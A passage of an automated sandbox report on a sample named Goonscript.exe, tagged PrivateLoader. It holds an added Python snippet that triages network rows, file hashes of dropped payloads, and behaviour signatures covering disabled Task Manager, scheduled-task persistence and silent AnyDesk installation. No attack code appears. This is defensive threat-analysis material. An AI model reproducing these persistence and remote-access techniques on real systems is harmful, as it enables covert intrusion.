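The table above mixes three kinds of rows: resolver queries to 8.8.8.8:53 (the Domain column is the name queried), TCP connections to the resolved hosts, and several hundred UDP datagrams to 239.255.102.18, an address in the administratively scoped multicast range that is not Internet-routable. Rows without a domain carry only three fields. The Python below is an added example, not part of the report: it parses rows in this layout, collapses repeats into distinct endpoints, counts the multicast noise instead of listing it, and flags the remote-access infrastructure. The embedded rows are a subset copied from the table; the suffix list used to flag remote-access tooling is an analyst-chosen assumption.

```python
# Added example (not part of the report): reduce a sandbox Network table to
# the distinct endpoints an analyst would block or hunt for.
from collections import defaultdict

# Rows copied from the Network table above; rows with no Domain have 3 fields.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 boot.net.anydesk.com udp
DE 49.12.130.236:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-d4aa0625.net.anydesk.com udp
GB 57.128.141.164:443 relay-d4aa0625.net.anydesk.com tcp
DE 49.12.130.236:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 ctt.ac udp
US 134.209.68.5:443 ctt.ac tcp
US 134.209.68.5:443 ctt.ac tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:20001 udp
N/A 239.255.102.18:50002 udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
"""

# Domain suffixes treated as remote-access tooling (assumed, analyst-curated).
RMM_SUFFIXES = (".net.anydesk.com",)


def parse_network_table(text):
    """Parse 'Country Destination Domain Proto' rows; Domain may be absent."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            (country, dest, proto), domain = parts, ""
        else:
            continue                            # malformed or blank line
        host, _, port = dest.rpartition(":")
        rows.append({"country": country, "host": host, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def is_multicast(ip):
    """True for IPv4 224.0.0.0/4, which covers the 239.x administratively scoped groups."""
    first = int(ip.split(".")[0])
    return 224 <= first <= 239


def summarize(rows):
    """Split rows into DNS queries, distinct unicast endpoints and multicast noise."""
    dns = set()
    endpoints = defaultdict(set)       # domain (or bare IP) -> {(ip, port, proto)}
    multicast = 0
    for r in rows:
        if r["port"] == 53 and r["proto"] == "udp":
            dns.add(r["domain"])       # resolver query, not an endpoint to block
        elif is_multicast(r["host"]):
            multicast += 1             # never leaves the local network; count only
        else:
            key = r["domain"] or r["host"]
            endpoints[key].add((r["host"], r["port"], r["proto"]))
    rmm = sorted(d for d in endpoints if d.endswith(RMM_SUFFIXES))
    return {"dns_queries": sorted(dns), "endpoints": dict(endpoints),
            "multicast_datagrams": multicast, "rmm_domains": rmm}


if __name__ == "__main__":
    summary = summarize(parse_network_table(NETWORK_TABLE))
    for name, conns in sorted(summary["endpoints"].items()):
        print(name, sorted(conns))
    print("multicast datagrams:", summary["multicast_datagrams"])
    print("remote-access domains:", summary["rmm_domains"])
```

Keying endpoints by domain first and falling back to the bare IP keeps CDN-fronted names (the 104.x Cloudflare ranges above) from being mistaken for distinct infrastructure, while the multicast counter makes the table readable again: in the full listing those datagrams outnumber every real connection.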

Files

C:\Users\Admin\AppData\Local\Temp\20E9.tmp\20EA.tmp\20EB.vbs

MD5 3c37e86d3572f4f291e0bf5c9ab78e41
SHA1 4a2617dbbba0fc65275bbacf6738d604cbfd4eae
SHA256 426f46f8c62e39fffe4e2763cf87d3b5de568b0a0179737028db0e2ed43d0e16
SHA512 5e827131ef024f358d3fc952f8b489003568b948d0a5a24556db1aeb8b00b21a04d1f6483652bf830a5050ccc3d734b27bf385129007305a93d16d844e84303c

C:\Users\Admin\AppData\Roaming\doorbell-sys.exe

MD5 583050ddb118acb68beb4e210b243c53
SHA1 da7a9d361cb60ebe9e767710585cfeb4d0f84444
SHA256 10c2c130f92a90332bf66f137978ff49d88397b71f0e31a9fccbfeabc1968245
SHA512 de869a3ee8d793a42a432c12b3cc6c0a4fbd60e4713c2f5199c576841c0d6640f66f9b2ba88af97f6b5dce5498cb5387687924941f1f24db8136a8bbe4cfece5

C:\Users\Admin\AppData\Local\Temp\21D3.tmp\21D4.tmp\21D5.bat

MD5 c9dc4166ceb77ae5e86ea472b989b34c
SHA1 340ee384d950b11977799791854c793e7347b091
SHA256 223338d4ba378aa7d08dec85f046a0c56accb9fb02dd01a9876c69a428fc0594
SHA512 8533e83302ddc866d2e41e7adcc000083537d5975668bc9ac5266dfe43f89cf384d10eeecabeb940fc69f02d80ae5a8efd5c29ff084b3ca90b4bb7e13c95c7fe

C:\Users\Admin\Downloads\AnyDesk.exe

MD5 aee6801792d67607f228be8cec8291f9
SHA1 bf6ba727ff14ca2fddf619f292d56db9d9088066
SHA256 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499
SHA512 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f

memory/3012-31-0x0000000001090000-0x00000000027D9000-memory.dmp

memory/2792-38-0x0000000001090000-0x00000000027D9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 4a56c6a2d4899e7b25a4fa79d1bc94a4
SHA1 1396ac182235801ab0d121822bb96b3414c34895
SHA256 f5acb4134c1024590be411b9cd57d794ef9e38dff3a98948c36bf915c27dbc4f
SHA512 aa2a770ede3508fcf05b8006f70a3696f64e1b2ee9d940b62977132a547cc0051329359dfdfbb660746bed31727eacc361007002dece3c37bdb01d966b9dcb0f

memory/2984-48-0x0000000001090000-0x00000000027D9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 a787c308bd30d6d844e711d7579be552
SHA1 473520be4ea56333d11a7a3ff339ddcadfe77791
SHA256 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440
SHA512 da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 f4fb409ecde15202fdeb9b1a17b2dade
SHA1 81dafc4ec53e826978235c117f28b498dcfc43e2
SHA256 43dff269482a34b78ae3de0ee866b94c704bd19ed79294009c4df63324b57c2d
SHA512 4531f03626ed4d3fe772b1a04eb59b013b7bfdda675a93aed44e7a3a1076ade6b387c0286bba6516ae234fc3e2d2d501c87745a9df1d11038886bcdec1f8c7f2

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 744b34b58fb1219ccb2e6ab8bed9fdb4
SHA1 86acfeb4512c1fe52de5f35c4c9f5910115a042e
SHA256 daec21fbf622b98fec4da3ed08a6fed59babc2d65248303b089430e63dcee428
SHA512 8c03dc310ac54b597c718e6e151d08cd2bf791006b4142b821c7d4927a276b477bc36916293f28907b4286d0cbb25b6b8a0de3978e7bb71002b5c77307c8422a

C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

MD5 5b4c9f2b9e5f7fd381cd1274567abd96
SHA1 809dad4e98bd23109358d9a76745ac6674a70a99
SHA256 4066f069c73b2c862e0ff4b13bcdda69e8be652b8a68c32e8d4c8afa10d3423a
SHA512 f9e3144418964b36f33c41e2143938bdac1bdad061df794a97e5fc754f217d10fd26339f448ea17c7d253cca70fcf92f7ca7410082c2f9e22edea4cd339b9d14

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 52e12ab9343da2ecd309936c1bc875fc
SHA1 8af5668f51779d5fa2b1ca0a3d56dcfed0925b9f
SHA256 dfa7dfd141c1cd2b799f066af5fad58a3bbb0d3c2ef5cb40003d41c601da6859
SHA512 32276cbadf58ecca7f2fb30fd98656b7fc803a4260f4a17259764a5ddae7fc966d5be8a15df57d5a65b77fc23334e80984e1a3a94a89d1d4070289f962f6569b

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 0301a4c01baff81872539c058d24d2ac
SHA1 3c4f0590dd9c729992499341030e0a4fd8c87255
SHA256 b223e2079cb83d01184e2c7488e591e5c340a80fdc3a1b3acedb7b6fde124762
SHA512 6f31c08254cc1cc40e8b987501e47800d1d039cd2caa37640519980f4b41b0f6051897ce15c06ab7299d2f08c850bf71fe9102d3604444fe701c3a9c7a162ea2

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2792-153-0x0000000001090000-0x00000000027D9000-memory.dmp

memory/2984-154-0x0000000001090000-0x00000000027D9000-memory.dmp

memory/1476-161-0x0000000000250000-0x0000000001999000-memory.dmp

C:\ProgramData\AnyDesk\system.conf

MD5 afdc4f69f4720b8c4153f6186f49a2b6
SHA1 329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA256 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
SHA512 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

C:\ProgramData\AnyDesk\system.conf

MD5 07df9ab0eb0924595aa3ad7a80deccfa
SHA1 80545799b3c11d94a46369b584cebc622404c9e2
SHA256 2ec9b61a1368e88963b7ee0149999e88af691771842fbb615a0126627a6dbe5e
SHA512 91c4a8cf8def9b62dbc8afb19496945bcf13c06b9413c94331966e50425e41934fd9fa6450c797df18af2255f596ab77ad81b808c3290b0e70c73a504c1ee9db

memory/3012-215-0x00000000001B0000-0x00000000001B2000-memory.dmp

memory/3012-218-0x0000000001090000-0x00000000027D9000-memory.dmp

memory/1640-220-0x0000000000250000-0x0000000001999000-memory.dmp

memory/1288-222-0x0000000000250000-0x0000000001999000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 cc4454c2c4ce961fa5253d455d888909
SHA1 46f5b2bcc7bb5030d6ddb60221ad77cd88b6c61a
SHA256 5a0814bc29298a90cc3ae11942803759e22d8c0335f4216a2373b063f9161276
SHA512 5a01d11e1c83ab5404d9835a8177866b9a71912d7ea91f092c15e7713c94f8fbed6dcdd2255cb7f18b48900f12f522992e8b8ada8a821b1750d61011feff232b

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 21a548002f5ae7bf49b4d23911abd9d8
SHA1 eefe4b8243363cef15e76b1afea7b0ac15e7901f
SHA256 b3af7e9d79615f414d4800a7a845c1a8fcbf83faa55a8baeb2ea7d0f67d3b1cc
SHA512 9cb2a33a3f652135896fdba2f4acb4353954c611f55378599c568f216e36a155e84e1193d577aafd603ccd85d1b32bae4616c2d76b4d15ccbbe71321ee6c7e15

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 1213cf28283e60c1dd8a8a55809d1a30
SHA1 cb77f2cbbe93a2844af5b51620f877e2fdbfaa85
SHA256 1e485c4a5d34a5aeb190a2a05182e64dd3e783c02eb7e05dc7a7b5bd80ac9f4a
SHA512 c19ce99698df2a07f96cadcadeb5aa9d15c5dc9ded7221bb13a630386ca68a7aefce60afff17e75be59a882c10b20b94d631b812967695b4bed84bd81986e89a

C:\ProgramData\AnyDesk\service.conf

MD5 243d32bf7d328cc7936aaa415c9aa163
SHA1 492cae0d6537e61891ac71e89c45b560f0a0e0db
SHA256 15c51bd21a62c28070bba84e8d8297be701e11b37529e756f82d46f9237693c9
SHA512 ac29e370a2e82a744a5c91e31c250890a6bc0ecbba6045f5c3718ca7bbcc0126ce51525ffa69179ab85312c4c61579ce53e5c6df93966c7950a5db6646fc36f4

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 7b37981dcc7fd17834c7cffb8c4aee4b
SHA1 e2caa7e2c5e086cb30e27019ea1f7c6ad9021374
SHA256 e639cfc78377c095bc1b76f507df0e3d55f914c2ac25ab854c6409679459cd61
SHA512 3f0c5e3252c9f8c139d35282f80b778496e6c6ccf3f173e65c86f99c349164aee3b77c000269ae501888518fc5f0f6550e575a50d18f49685bf3951ece042695

memory/1288-238-0x0000000000250000-0x0000000001999000-memory.dmp

memory/2352-241-0x0000000000250000-0x0000000001999000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 4fc9cff4ad9eaef4faa9e560ac7c4b6d
SHA1 eba161bac2671889bd6f04eb60f7c218716775ff
SHA256 05f5276acc9acdf7ecf30f657f694071a5babe29779b9e738aa118ba9acc3d05
SHA512 725f753f788d34ccf3f04319c54280b9ceadde5d4f3d2636c7ccdb12e5be77bfa266eb4f79b194cd9c9b3c16a664bc87f4e1e111b6a0c5fed3acc8eded1c7f0e

C:\ProgramData\AnyDesk\system.conf

MD5 01faed046bbfb729aa27be805d9ad0b0
SHA1 a8ed8ae329424fd8cc9c62adad3a61e1f9ce0f0e
SHA256 4f205c074be22225ff966b0570f2e3cd74bba7e07d68f7e10f9ef62faf626943
SHA512 aac31eacf03442fa52f064655c8ae05fac692a7a7c8c2ff0e18d3f327f79ab802dea6ca22563b318b9a1f4058f974b85a8f5f7058155efb44555c08cce3ed3d5

C:\ProgramData\AnyDesk\service.conf

MD5 9fcd4aca7ef33c54dca35540c29a60e6
SHA1 f76ca292f690837b8a7c0a623ea5c9ff0c8a0f8e
SHA256 1464508abe9d8a15cb52e4555921b1fc459f54b866d73f26d6e21b69a2a14486
SHA512 6fd031309fe64bebe91415927f773fb10d166b1a4fb1d799ffdd891f88fae37090e418e8aed2e788c0f6f08dd1153dd0c35961f44cf5e9206ee1a65cab9febb8

memory/2352-250-0x0000000000250000-0x0000000001999000-memory.dmp

memory/2612-255-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2612-256-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\users\Admin\downloads\stn.exe

MD5 5a1f7251dc370ebecd121ec50c3c7687
SHA1 63e672099264cdaecb7b23e9533da2e52e819de5
SHA256 ced26842f55378cc57ca36f3ae366b59e96eeb5a8a0abbc000eb72f16df01ee8
SHA512 afe17a4bf0e511c40072cb614ef619f10eaec878538299223946231658c4da1f7e652ca3b1dfe848da2ff8b17d8a47cfd9c76f6b35fee3a488b7407bb82be493

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5b4bb72df65d79c2a11237f1e1f9983e
SHA1 aaffeb5cddd5cc5e4cc01d65419ed0f3e71a5a3a
SHA256 afff58ccbbb5693508d8e110b6026a56f4f0d2554f9a3f7e21b7048a9da86227
SHA512 5f4af1be3cae36b94482a0bc13c1dd7f55ec31ec3d3564e7e8a9b823fbc01d0b4e8e19d07d4042c9ecdd4a04444d14b814af472cd9703fa5ad5c09c91d42a487

memory/2736-272-0x0000000002250000-0x0000000002258000-memory.dmp

memory/2736-271-0x000000001B630000-0x000000001B912000-memory.dmp

C:\ProgramData\svchost.exe

MD5 195594bf561f51edd8f766783b8c4791
SHA1 4be31254244e495bcb85b7dfcde98ca6be8789a0
SHA256 57a5abd41f0b9e52dc6390cecbe9caf1a6f2bbc73a9baba61a0fd57c7eb9e52a
SHA512 4a0df7637351a649458bae2b20a3317cb40b82ff03e4c53900b581a553626bf270f716d4deae19af86984012dfe22f5d92f5172ac1e6794c1956a792602123cc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5C8B3RO0OBIMI686NJ3U.temp

MD5 b9f718d0596f8b026193eb67fac4cbf1
SHA1 52f002dfb29a339772a6ff7d9293c9e6c27f53eb
SHA256 4e44503cee36189153533e2b2fc39f52cb43690ac31142b9a60c6a4d2c362f28
SHA512 3055398ca22ddb401988fa20b054750b318621e4429a9e721065d6e6c791c4e1c28af35daab54c0f41893a61c21220cd56abbf5a09554bf0c6ab3d5ac74c96b1

C:\users\Admin\downloads\conhost.exe

MD5 3f609615628633f1ff84e6e73ed31ec0
SHA1 0015273fd5533b876b69dbbb1a0257b8f491c11f
SHA256 4fb9a00c6e3f24ac9cd7f171e1ffe1dcf3aecbe62defea080cd791c54767e2b4
SHA512 fc40a832de74166b21bc79f71947d053d3dfa5da87e5a0412349adf115955d09e078fa3849085d7afc1c3e537f6be83b88df235ba4cdf127e7d6e0406bf2d7a1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8K09KPGW76K558W131OR.temp

MD5 41f768c871200da412c00b630e35b131
SHA1 400e6b21a4a0b458092d928143065dd273d980cd
SHA256 9690385d4820405ed44560269ce17489c8214f0e99096b6053b344e123b1aa74
SHA512 a5e045c450affb5ac9b4cca479c83fbbdb45fa5be498be3421c7fbe298270bbc355af7cd629c5abd04da93ee28ab481f42ea3199a36441b9598d0c9bd0a8efed

memory/1140-332-0x000000001B580000-0x000000001B862000-memory.dmp

memory/1140-333-0x0000000002810000-0x0000000002818000-memory.dmp

memory/876-339-0x000000001B660000-0x000000001B942000-memory.dmp

memory/876-340-0x0000000002960000-0x0000000002968000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\favicon[1].ico

MD5 fbc823a3900c2ddc64bc561ae4950560
SHA1 4f4de67a42a9159db2af02e59e5b9b5469d91370
SHA256 47a74ea5b48e0f2d025328d4f989d5c7dc022868b709d9fd434cda4e9a7045f0
SHA512 3a58c968d557c37d457ade5903a1cf4a68416e79a2ccdd74faa5d36072902f7b113380ae58b7b2ce1f4eb16404515de8f751148ca9259cf1166a4abf1da5864f

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\re26ad0\imagestore.dat

MD5 2fbf6bb8e750373cfb44b14883f9d0ca
SHA1 9ff1ebead918d853de0e0951873f98b235676baf
SHA256 df29ba31faa6b1f71a6c7b4e5c78ae2fd60765d510f998c93bba402053ed31b9
SHA512 a7cd8a586b6769b151da31c85fae0ca2cad2e9db68df6c918539ee10c05fe8a51c0bb6b29b9d02693897d72fb3331f0d420ef5953ae305ee2f1fa8879f263149

C:\ProgramData\AnyDesk\system.conf

MD5 472d83d2c021c702060c76817a9680f9
SHA1 cd89ed34e2fbee09d633510c343194ac0713a6f6
SHA256 21072ec3ecdf72ed25cc1720f4e08a9123df22e0db1739f3ffb9999df0f3ade2
SHA512 a24c40f2a4fdbd7c2fecc72fa13725a227628a242b628cd30df7e5aa924e04a80666976e9831411d00ce4b0850634b09f1bb2e4741f90b6ba1504bd65df81132

C:\Users\Admin\AppData\Local\Temp\Cab3E1C.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar3E1E.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 325f8d43e0cc9cdbddbf674105debc57
SHA1 0602a7813a9ec1992b4cbf6a919c6e043850763c
SHA256 e9ef93c79c1e8bacc87aad58f7bff9a16056ce753edb30b238ccd9c7c88f0786
SHA512 f7a9f78129feaba0b1b58c1d69b943f5e8cf1e89e36cdc029f695a51ca09f212c0f049e5844915d91a6061b538b855e27e665ed1ea51418f6eb035e71840c20e

C:\Users\Admin\AppData\Local\Temp\Tar3F0E.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e6b3881d34512ba958fd940782aa9360
SHA1 5a7549349560a74e5bfa6d77eddbee1b0c5c714f
SHA256 e97f8c0a48d1c205e98d77f8be1b008e8014f30dbe3e0e9e46e828b61d708d14
SHA512 d6e7563c1b09e1a39d5fbe53ca8ed94a30be174e864af6a416091989d02114746c895455968a316c0b73d1eccd3a749a6ea23847324feab0a33bf5069f388859

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5aad477aea1316800aba4c0dc180cad0
SHA1 b3c42f82d5ebdab3c1f58e5c944b239709602828
SHA256 e32ebee6393e398102275612b814c9e7c35472c491370dfdcfd350ef01afadbb
SHA512 07d5934a7020aa9e4c95606cea880753b511980dbb756d1982eb0bd2a23d45d9f91440e2551a712153d9a77fbf397d56a7aad00c7674f8384238fea9b6394c01

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3cb115b96199259fc94d8f22b4aa1620
SHA1 e03bac29cee24c250a216a94407a84b3de2b2c59
SHA256 a4d34dc2e1b9b1caf9acf05b6950a5e35130c1f7256e049fe2cd636908e71b7f
SHA512 dbb4ad47fe75c21cc82031ed09e278a50119a63cb337ca12cae63e5de5aa2448acc7ba5354cac1f72a568cd79afe092b424cbe6544e4a3975670adaeea767758

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ebb382fb5a30d4ae3670409b97fd0f20
SHA1 5437a79a966f681f91d66bfd8f36fd0e77ebdc36
SHA256 c6c3e6c990a63047cee8f39701609e94437da1110a102419fb823453ff0008c5
SHA512 de011b5a7e4cbd8ace93ad422b3ce9e746314ae2d8e8bde5cda9c08324b3dc3b9d6daf9101b57f42559da40bf7cb20c45e782236d17192b521af0dc5041ae11c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2a312477fab1ec293eaa0cad8b90d798
SHA1 356fcf7423b688cbd9c3df9c48f0eaa4a2e63767
SHA256 89bfb3369f1032e6bbf6743c38353bd9cdea7b7f9f5bcf618b46581824bb626a
SHA512 7c0473385748793fdc17489ba9e2e6f8fad5763012d8c49123f11d3ee04c452e856f23998a008ca4af32ca423b1e8e8d8bb95b19ea94b98c3a67b8a0b0918feb


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 18:38

Reported

2024-05-09 18:40

Platform

win10v2004-20240508-en

Max time kernel

143s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"

Signatures

PrivateLoader

loader privateloader

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Goonscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\doorbell-sys.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\locked.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\ProgramData\AnyDesk.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\AnyDesk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\AnyDesk.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
